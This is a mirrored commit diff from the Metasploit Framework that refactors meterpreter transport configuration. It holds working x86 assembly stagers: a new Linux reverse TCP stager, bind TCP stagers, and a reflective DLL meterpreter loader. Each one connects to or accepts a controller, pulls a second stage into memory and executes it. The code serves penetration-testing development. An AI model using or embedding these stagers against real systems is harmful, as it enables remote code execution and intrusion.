infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5300, meterpreter and stager multi-transport

unstable
Brent Cook 2015-05-14 00:05:53 -05:00
parent 5f3947312d 181c770a4e
commit 7bbc171ca3
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
55 changed files with 1642 additions and 1172 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Gemfile.lock
View File

@ -9,7 +9,7 @@ PATH
json
metasploit-concern (~> 1.0)
metasploit-model (~> 1.0)
metasploit-payloads (= 0.0.3)
metasploit-payloads (= 0.0.5)
msgpack
nokogiri
packetfu (= 1.1.9)
@ -123,7 +123,7 @@ GEM
activemodel (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (0.0.3)
metasploit-payloads (0.0.5)
metasploit_data_models (1.0.1)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)

6
lib/msf/base/sessions/meterpreter.rb
View File

@ -307,6 +307,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
begin
self.machine_id = self.core.machine_id(timeout)
self.payload_uuid ||= self.core.uuid(timeout)
return true
rescue ::Rex::Post::Meterpreter::RequestError
# This meterpreter doesn't support core_machine_id
@ -326,8 +328,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
begin
::Timeout.timeout(60) do
# Gather username/system information
username = self.sys.config.getuid
sysinfo = self.sys.config.sysinfo
username = self.sys.config.getuid
sysinfo = self.sys.config.sysinfo
safe_info = "#{username} @ #{sysinfo['Computer']}"
safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)

1
lib/msf/base/sessions/meterpreter_options.rb
View File

@ -18,7 +18,6 @@ module MeterpreterOptions
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]),
OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]),
OptBool.new('StagerCloseListenSocket', [false, "Close the listen socket in the stager", false]),
OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]),
OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]),
OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]),

37
lib/msf/core/handler/reverse_hop_http.rb
View File

@ -90,7 +90,7 @@ module ReverseHopHttp
ReverseHopHttp.hop_handlers[full_uri] = self
self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri,
self) do |uri, hop_http|
hop_http.send_new_stage # send stage to hop
hop_http.send_new_stage(uri) # send stage to hop
delay = 1 # poll delay
# Continue to loop as long as at least one handler or one session is depending on us
until hop_http.refs < 1 && hop_http.handlers.empty?
@ -138,7 +138,7 @@ module ReverseHopHttp
:ssl => false,
})
# send new stage to hop so next inbound session will get a unique ID.
hop_http.send_new_stage
hop_http.send_new_stage(uri)
else
hop_http.lock.unlock
end
@ -241,34 +241,27 @@ module ReverseHopHttp
#
# Generates and sends a stage up to the hop point to be ready for the next client
#
def send_new_stage
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
def send_new_stage(uri)
# try to get the UUID out of the existing URI
info = process_uri_resource(uri)
uuid = info[:uuid] || Msf::Payload::UUID.new
# generate a new connect
sum = uri_checksum_lookup(:connect)
conn_id = generate_uri_uuid(sum, uuid)
url = full_uri + conn_id + "/\x00"
print_status("Preparing stage for next session #{conn_id}")
blob = stage_payload
#
# Patch options into the payload
#
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
:ssl => ssl?,
:url => url,
:expiration => datastore['SessionExpirationTimeout'],
:comm_timeout => datastore['SessionCommunicationTimeout'],
:ua => datastore['MeterpreterUserAgent'],
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass'])
blob = encode_stage(blob)
blob = stage_payload(
uuid: uuid,
uri: conn_id
)
#send up
crequest = mclient.request_raw(
'method' => 'POST',
'uri' => control,
'data' => blob,
'data' => encode_stage(blob),
'headers' => {'X-init' => 'true'}
)
res = mclient.send_recv(crequest)

28
lib/msf/core/handler/reverse_http.rb
View File

@ -1,7 +1,6 @@
# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
require 'rex/payloads/meterpreter/patch'
require 'rex/payloads/meterpreter/uri_checksum'
require 'rex/post/meterpreter/packet'
require 'rex/parser/x509_certificate'
@ -324,27 +323,12 @@ protected
resp['Content-Type'] = 'application/octet-stream'
blob = obj.stage_payload
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
datastore['HandlerSSLCert'])
#
# Patch options into the payload
#
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
:ssl => ssl?,
:url => url,
:ssl_cert_hash => verify_cert_hash,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
:ua => datastore['MeterpreterUserAgent'],
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass'])
# generate the stage, but pass in the existing UUID and connection id so that
# we don't get new ones generated.
blob = obj.stage_payload(
uuid: uuid,
uri: conn_id
)
resp.body = encode_stage(blob)

75
lib/msf/core/handler/reverse_http/stageless.rb
View File

@ -1,75 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/parser/x509_certificate'
require 'msf/core/payload/uuid_options'
module Msf
##
#
# Helper functionality for handling of stageless http(s) payloads
#
##
module Handler::ReverseHttp::Stageless
include Msf::Payload::Windows::VerifySsl
include Msf::Payload::UUIDOptions
def initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
], self.class)
end
def generate_stageless(opts={})
unless opts[:generator]
raise ArgumentError, "Stageless generation requires a generator argument"
end
if opts[:ssl].nil?
raise ArgumentError, "Stageless generation requires an ssl argument"
end
host = datastore['LHOST']
host = "[#{host}]" if Rex::Socket.is_ipv6?(host)
url = "http#{opts[:ssl] ? "s" : ""}://#{host}:#{datastore['LPORT']}"
# Use the init_connect mode because we're stageless. This will force
# MSF to generate a new URI when the first request is made.
url << "#{generate_uri_uuid_mode(:init_connect)}/"
# invoke the given function to generate the architecture specific payload
opts[:generator].call(url) do |dll|
verify_cert_hash = nil
if opts[:ssl]
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
datastore['HandlerSSLCert'])
end
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
:url => url,
:ssl => opts[:ssl],
:ssl_cert_hash => verify_cert_hash,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
:ua => datastore['MeterpreterUserAgent'],
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass'])
end
end
end
end

62
lib/msf/core/payload/linux/bind_tcp.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
module Msf
@ -14,31 +15,24 @@ module Msf
module Payload::Linux::BindTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Linux
def close_listen_socket
datastore['StagerCloseListenSocket'].nil? || datastore['StagerCloseListenSocket'] == true
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_bind_tcp(
port: datastore['LPORT'],
close_socket: close_listen_socket
)
end
conf = {
port: datastore['LPORT'],
close_socket: close_listen_socket,
reliable: true
port: datastore['LPORT'],
reliable: false
}
# Generate the more advanced stager if we have the space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:reliable] = true
end
generate_bind_tcp(conf)
end
@ -50,19 +44,20 @@ module Payload::Linux::BindTcp
Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end
def transport_config(opts={})
transport_config_bind_tcp(opts)
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = 104
space = cached_size
# Reliability checks add 4 bytes for the first check, 5 per recv check (2)
space += 14
# Adding 6 bytes to the payload when we include the closing of the listen
# socket
space += 6 if close_listen_socket
# TODO: coming soon
#space += 14
# The final estimated size
space
@ -77,7 +72,6 @@ module Payload::Linux::BindTcp
def asm_bind_tcp(opts={})
#reliable = opts[:reliable]
close_socket = opts[:close_socket]
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
asm = %Q^
@ -99,10 +93,7 @@ module Payload::Linux::BindTcp
mov ecx,esp
mov al,0x66 ; socketcall syscall
int 0x80 ; invoke socketcall (SYS_SOCKET)
^
unless close_socket
asm << %Q^
; set the SO_REUSEADDR flag on the socket
push ecx
push 4
@ -119,11 +110,8 @@ module Payload::Linux::BindTcp
int 0x80
xchg eax,edi ; restore the socket handle
add esp, 0x14
pop ecx
^
end
pop ecx ; restore ecx
asm << %Q^
pop ebx
pop esi
push edx
@ -138,15 +126,8 @@ module Payload::Linux::BindTcp
shl ebx,1 ; SYS_LISTEN
mov al,0x66 ; socketcall syscall (SYS_LISTEN)
int 0x80 ; invoke socketcall
^
if close_socket
asm << %Q^
push eax ; stash the listen socket
^
end
asm << %Q^
inc ebx ; SYS_ACCEPT
mov al,0x66 ; socketcall syscall
mov [ecx+0x4],edx
@ -156,16 +137,9 @@ module Payload::Linux::BindTcp
mov al,0x3 ; read syscall
int 0x80 ; invoke read
xchg ebx,edi ; stash the accept socket in edi
^
if close_socket
asm << %Q^
pop ebx ; restore the listen socket
mov al,0x6 ; close syscall
int 0x80 ; invoke close
^
end
asm << %Q^
jmp ecx ; jump to the payload
^

128
lib/msf/core/payload/linux/reverse_tcp.rb Normal file
View File

@ -0,0 +1,128 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/linux'
module Msf
###
#
# Complex reverse TCP payload generation for Linux ARCH_X86
#
###
module Payload::Linux::ReverseTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Linux
#
# Generate the first stage
#
def generate
conf = {
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['ReverseConnectRetries'],
reliable: false
}
# Generate the advanced stager if we have space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end
generate_reverse_tcp(conf)
end
def transport_config(opts={})
transport_config_reverse_tcp(opts)
end
#
# Generate and compile the stager
#
def generate_reverse_tcp(opts={})
asm = asm_reverse_tcp(opts)
buf = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
apply_prepends(buf)
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = 300
# Reliability adds 10 bytes for recv error checks
space += 10
# The final estimated size
space
end
#
# Generate an assembly stub with the configured feature set and options.
#
# @option opts [Fixnum] :port The port to connect to
# @option opts [String] :host The host IP to connect to
# @option opts [Bool] :reliable Whether or not to enable error handling code
#
def asm_reverse_tcp(opts={})
# TODO: reliability is coming
retry_count = [opts[:retry_count].to_i, 1].max
reliable = opts[:reliable]
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
asm = %Q^
xor ebx, ebx
mul ebx
push ebx
inc ebx
push ebx
push 0x2
mov al, 0x66
mov ecx, esp
int 0x80 ; sys_socketcall
xchg eax, edi
pop ebx
push #{encoded_host}
push #{encoded_port}
mov ecx, esp
push 0x66
pop eax
push eax
push ecx
push edi
mov ecx, esp
inc ebx
int 0x80 ; sys_socketcall
mov dl, 0x7
mov ecx, 0x1000
mov ebx, esp
shr ebx, 0xc
shl ebx, 0xc
mov al, 0x7d
int 0x80 ; sys_mprotect
pop ebx
mov ecx, esp
cdq
mov dh, 0xc
mov al, 0x3
int 0x80 ; sys_read
jmp ecx
^
asm
end
end
end

71
lib/msf/core/payload/transport_config.rb Normal file
View File

@ -0,0 +1,71 @@
# -*- coding: binary -*-
require 'msf/core/payload/uuid_options'
##
# This module contains helper functions for creating the transport
# configuration stubs that are used for Meterpreter payloads.
##
module Msf::Payload::TransportConfig
include Msf::Payload::UUIDOptions
def transport_config_reverse_tcp(opts={})
config = transport_config_bind_tcp(opts)
config[:lhost] = datastore['LHOST']
config
end
def transport_config_reverse_ipv6_tcp(opts={})
config = transport_config_reverse_tcp(opts)
config[:scheme] = 'tcp6'
config[:scope_id] = datastore['SCOPEID']
config
end
def transport_config_bind_tcp(opts={})
{
:scheme => 'tcp',
:lhost => datastore['LHOST'],
:lport => datastore['LPORT'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i
}
end
def transport_config_reverse_https(opts={})
config = transport_config_reverse_http(opts)
config[:scheme] = 'https'
config[:ssl_cert_hash] = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
datastore['HandlerSSLCert'])
config
end
def transport_config_reverse_http(opts={})
# most cases we'll have a URI already, but in case we don't
# we should ask for a connect to happen given that this is
# going up as part of the stage.
uri = opts[:uri]
unless uri
sum = uri_checksum_lookup(:connect)
uri = generate_uri_uuid(sum, opts[:uuid])
end
{
:scheme => 'http',
:lhost => datastore['LHOST'],
:lport => datastore['LPORT'].to_i,
:uri => uri,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass']
}
end
end

6
lib/msf/core/payload/windows.rb
View File

@ -24,6 +24,8 @@ module Msf::Payload::Windows
require 'msf/core/payload/windows/dllinject'
require 'msf/core/payload/windows/exec'
require 'msf/core/payload/windows/loadlibrary'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/core/payload/windows/reflectivedllinject'
require 'msf/core/payload/windows/x64/reflectivedllinject'
@ -32,10 +34,12 @@ module Msf::Payload::Windows
#
@@exit_types =
{
nil => 0, # Default to nothing
'' => 0, # Default to nothing
'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter
'thread' => 0x0A2A1DE0, # ExitThread
'process' => 0x56A2B5F0, # ExitProcess
'none' => 0x5DE2C5AA, # GetLastError
'none' => 0x5DE2C5AA # GetLastError
}
#

59
lib/msf/core/payload/windows/bind_tcp.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
@ -16,37 +17,33 @@ module Msf
module Payload::Windows::BindTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk
def close_listen_socket
datastore['StagerCloseListenSocket'].nil? || datastore['StagerCloseListenSocket'] == true
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_bind_tcp(
port: datastore['LPORT'].to_i,
close_socket: close_listen_socket
)
end
conf = {
port: datastore['LPORT'].to_i,
exitfunk: datastore['EXITFUNC'],
close_socket: close_listen_socket,
reliable: true
port: datastore['LPORT'],
reliable: false
}
# Generate the more advanced stager if we have the space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:reliable] = true
end
generate_bind_tcp(conf)
end
def transport_config(opts={})
transport_config_bind_tcp(opts)
end
#
# Generate and compile the stager
#
@ -67,8 +64,7 @@ module Payload::Windows::BindTcp
#
def required_space
# Start with our cached default generated size
# TODO: need help with this from the likes of HD.
space = 277
space = cached_size
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
space += 31
@ -78,11 +74,6 @@ module Payload::Windows::BindTcp
# Reliability checks add 4 bytes for the first check, 5 per recv check (2)
space += 14
# if the payload doesn't need the listen socket closed then we save space. This is
# the case for meterpreter payloads, as metsrv now closes the listen socket once it
# kicks off (needed for more reliable shells).
space -= 8 unless close_listen_socket
# The final estimated size
space
end
@ -97,7 +88,6 @@ module Payload::Windows::BindTcp
def asm_bind_tcp(opts={})
reliable = opts[:reliable]
close_socket = opts[:close_socket]
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
asm = %Q^
@ -167,22 +157,12 @@ module Payload::Windows::BindTcp
push edi ; listening socket
push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
call ebp ; accept( s, 0, 0 );
^
if close_socket
asm << %Q^
push edi ; push the listening socket to close
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call ebp ; closesocket( s );
^
else
asm << %Q^
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
^
end
push edi ; push the listening socket
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call ebp ; closesocket( s );
asm << %Q^
recv:
; Receive the size of the incoming second stage...
push 0 ; flags
@ -213,7 +193,6 @@ module Payload::Windows::BindTcp
; Receive the second stage and execute it...
xchg ebx, eax ; ebx = our new memory address for the new stage
push ebx ; push the address of the new stage so we can return into it
read_more: ;
push 0 ; flags
push esi ; length

98
lib/msf/core/payload/windows/meterpreter_loader.rb Normal file
View File

@ -0,0 +1,98 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/reflective_dll_loader'
module Msf
###
#
# Common module stub for ARCH_X86 payloads that make use of Meterpreter.
#
###
module Payload::Windows::MeterpreterLoader
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows
def initialize(info = {})
super(update_info(info,
'Name' => 'Meterpreter & Configuration RDI',
'Description' => 'Inject Meterpreter & the configuration stub via RDI',
'Author' => [ 'sf', 'OJ Reeves' ],
'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'PayloadCompat' => { 'Convention' => 'sockedi -https', },
'Stage' => { 'Payload' => "" }
))
end
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
dec ebp ; 'M'
pop edx ; 'Z'
call $+5 ; call next instruction
pop ebx ; get the current location (+7 bytes)
push edx ; restore edx
inc ebp ; restore ebp
push ebp ; save ebp for later
mov ebp, esp ; set up a new stack frame
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader() (0x????????)
add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
call ebx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
; offset from ReflectiveLoader() to the end of the DLL
add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
^
unless opts[:stageless]
asm << %Q^
mov [ebx], edi ; write the current socket to the config
^
end
asm << %Q^
push ebx ; push the pointer to the configuration start
push 4 ; indicate that we have attached
push eax ; push some arbitrary value for hInstance
call eax ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
^
end
def stage_meterpreter(stageless=false)
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll'))
asm_opts = {
rdi_offset: offset,
length: dll.length,
stageless: stageless
}
asm = asm_invoke_metsrv(asm_opts)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
raise RuntimeError, "Meterpreter loader (x86) generated an oversized bootstrap!"
end
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
dll
end
end
end

96
lib/msf/core/payload/windows/reflectivedllinject.rb
View File

@ -30,11 +30,7 @@ module Payload::Windows::ReflectiveDllInject
'Platform' => 'win',
'Arch' => ARCH_X86,
'PayloadCompat' => { 'Convention' => 'sockedi -https', },
'Stage' =>
{
'Offsets' => { 'EXITFUNC' => [ 33, 'V' ] },
'Payload' => ""
}
'Stage' => { 'Payload' => "" }
))
register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class )
@ -44,65 +40,59 @@ module Payload::Windows::ReflectiveDllInject
datastore['DLL']
end
def stage_payload(target_id=nil)
def asm_invoke_dll(opts={})
asm = %Q^
; prologue
dec ebp ; 'M'
pop edx ; 'Z'
call $+5 ; call next instruction
pop ebx ; get the current location (+7 bytes)
push edx ; restore edx
inc ebp ; restore ebp
push ebp ; save ebp for later
mov ebp, esp ; set up a new stack frame
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader() (0x????????)
add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
call ebx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
push edi ; push the socket handle
push 4 ; indicate that we have attached
push eax ; push some arbitrary value for hInstance
mov ebx, eax ; save DllMain for another call
call ebx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
; push the exitfunk value onto the stack
push #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
push 5 ; indicate that we have detached
push eax ; push some arbitrary value for hInstance
call ebx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
^
end
def stage_payload
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(library_path)
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
asm_opts = {
rdi_offset: offset,
exitfunk: 'thread' # default to 'thread' for migration
}
bootstrap = "\x4D" + # dec ebp ; M
"\x5A" + # pop edx ; Z
"\xE8\x00\x00\x00\x00" + # call 0 ; call next instruction
"\x5B" + # pop ebx ; get our location (+7)
"\x52" + # push edx ; push edx back
"\x45" + # inc ebp ; restore ebp
"\x55" + # push ebp ; save ebp
"\x89\xE5" + # mov ebp, esp ; setup fresh stack frame
"\x81\xC3" + [offset-7].pack( "V" ) + # add ebx, 0x???????? ; add offset to ReflectiveLoader
"\xFF\xD3" + # call ebx ; call ReflectiveLoader
"\x89\xC3" + # mov ebx, eax ; save DllMain for second call
"\x57" + # push edi ; our socket
"\x68\x04\x00\x00\x00" + # push 0x4 ; signal we have attached
"\x50" + # push eax ; some value for hinstance
"\xFF\xD0" + # call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
"\x68" + exit_funk + # push 0x???????? ; our EXITFUNC placeholder
"\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached
"\x50" + # push eax ; some value for hinstance
"\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
asm = asm_invoke_dll(asm_opts)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if( bootstrap.length > 62 )
print_error( "Reflective Dll Injection (x86) generated an oversized bootstrap!" )
return
if bootstrap.length > 62
raise RuntimeError, "Reflective DLL Injection (x86) generated an oversized bootstrap!"
end
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
# patch in the timeout options
timeout_opts = {
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
}
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(dll, timeout_opts)
# patch the target ID into the URI if specified
if target_id
i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
if i
t = target_id.to_s
raise "Target ID must be less than 5 bytes" if t.length > 4
u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
print_status("Patching Target ID #{t} into DLL")
dll[i, u.length] = u
end
end
# return our stage to be loaded by the intermediate stager
return dll
dll
end
end

9
lib/msf/core/payload/windows/reverse_http.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
require 'msf/core/payload/uuid_options'
@ -17,6 +18,7 @@ module Msf
module Payload::Windows::ReverseHttp
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk
@ -85,6 +87,13 @@ module Payload::Windows::ReverseHttp
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end
#
# Generate the transport-specific configuration
#
def transport_config(opts={})
transport_config_reverse_http(opts)
end
#
# Generate the URI for the initial stager
#

9
lib/msf/core/payload/windows/reverse_https.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/reverse_http'
module Msf
@ -15,6 +16,7 @@ module Msf
module Payload::Windows::ReverseHttps
include Msf::Payload::TransportConfig
include Msf::Payload::Windows::ReverseHttp
#
@ -64,6 +66,13 @@ module Payload::Windows::ReverseHttps
generate_reverse_https(conf)
end
#
# Generate the transport-specific configuration
#
def transport_config(opts={})
transport_config_reverse_https(opts)
end
end
end

35
lib/msf/core/payload/windows/reverse_tcp.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
@ -14,41 +15,35 @@ module Msf
module Payload::Windows::ReverseTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk
#
# Register reverse_tcp specific options
#
def initialize(*args)
super
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_reverse_tcp(
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['ReverseConnectRetries'],
)
end
conf = {
host: datastore['LHOST'],
port: datastore['LPORT'],
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['ReverseConnectRetries'],
exitfunk: datastore['EXITFUNC'],
reliable: true
reliable: false
}
# Generate the advanced stager if we have space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end
generate_reverse_tcp(conf)
end
def transport_config(opts={})
transport_config_reverse_tcp(opts)
end
#
# Generate and compile the stager
#

14
lib/msf/core/payload/windows/reverse_winhttp.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
require 'msf/core/payload/windows/reverse_http'
@ -17,15 +18,9 @@ module Msf
module Payload::Windows::ReverseWinHttp
include Msf::Payload::TransportConfig
include Msf::Payload::Windows::ReverseHttp
#
# Register reverse_winhttp specific options
#
def initialize(*args)
super
end
#
# Generate the first stage
#
@ -52,6 +47,9 @@ module Payload::Windows::ReverseWinHttp
generate_reverse_winhttp(conf)
end
def transport_config(opts={})
transport_config_reverse_http(opts)
end
#
# Generate and compile the stager
#
@ -371,6 +369,8 @@ module Payload::Windows::ReverseWinHttp
pop eax ; clear the temporary storage
execute_stage:
xor edi, edi ; clear EDI, so we don't mislead meterpreter into
; thinking it has a valid socket to play with
ret ; dive into the stored stage address
got_server_uri:

7
lib/msf/core/payload/windows/reverse_winhttps.rb
View File

@ -1,8 +1,10 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/reverse_winhttp'
require 'msf/core/payload/windows/verify_ssl'
require 'rex/payloads/meterpreter/uri_checksum'
module Msf
@ -16,6 +18,7 @@ module Msf
module Payload::Windows::ReverseWinHttps
include Msf::Payload::TransportConfig
include Msf::Payload::Windows::ReverseWinHttp
include Msf::Payload::Windows::VerifySsl
@ -82,6 +85,10 @@ module Payload::Windows::ReverseWinHttps
generate_reverse_winhttps(conf)
end
